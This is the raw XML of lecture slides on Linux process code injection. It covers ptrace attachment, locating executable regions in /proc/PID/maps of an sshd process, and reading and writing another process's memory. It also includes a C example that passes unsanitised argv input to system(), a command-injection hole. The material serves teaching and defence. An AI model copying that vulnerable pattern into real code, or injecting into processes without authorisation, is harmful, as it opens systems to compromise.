              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the target, which has to be waited on with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57</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Attach a Process That You Want to Read or Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Chris Wellons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39492055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Next, we need to find a place within the process where we can write our injected code. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>easiest way to do this is to parse the “maps” file located in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>procfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> for the target. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>example, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/proc/PID/maps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>file for a running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> process on Ubuntu looks like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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58</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proc/PID/maps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2844329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D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/PID/maps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://res.cloudinary.com/xpnsec/image/upload/images/2017/03/map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924944"/>
            <a:ext cx="7877175" cy="2609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21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060848"/>
            <a:ext cx="7948405" cy="4464496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>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#include &lt;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stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</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#include &lt;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unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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main(</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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, char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argv</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char cat[] = "cat ";</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char *command;</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size_t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commandLength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0" indent="0">
              <a:buNone/>
            </a:pP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commandLength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 =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strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(cat) +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strlen</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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1]) + 1;</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command = (char *)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malloc</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commandLength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strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(command, cat,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commandLength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strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(command,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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1],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commandLength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 -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strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(cat)) );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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system(command);</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return (0);</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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Code Example 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Weilin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17062972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We need to search for a section which is mapped with execute permission (likely this will be “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a: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60</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/PID/maps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31714304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6"/>
            <a:ext cx="8496944" cy="3939821"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>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(PTRACE_ATTACH,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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 0, 0);</a:t>
            </a:r>
          </a:p>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waitpid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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, NULL, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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off_t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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = ...; // target process address</a:t>
            </a:r>
          </a:p>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pread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 &amp;value,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sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(value),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or</a:t>
            </a:r>
          </a:p>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pwrite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 &amp;value,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sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(value),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pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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a:p>
            <a:pPr marL="301943" lvl="1"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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(PTRACE_DETACH,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pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 0, 0</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close(</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p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>process will (and must) be stopped during this procedure, so do your reads/writes quickly and get out. The kernel will deliver the writes to the other process’ virtual memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>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61</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Write/Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Chris Wellons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10653381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62</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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process_vm_readv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50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073364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63</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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process_vm_writev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50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3812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On Linux, GDB uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which has a long, undocumented history of allowing a debugger to modify non-writable sections of a process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>image.</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64</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>GDB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Allow Writes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>to </a:t>
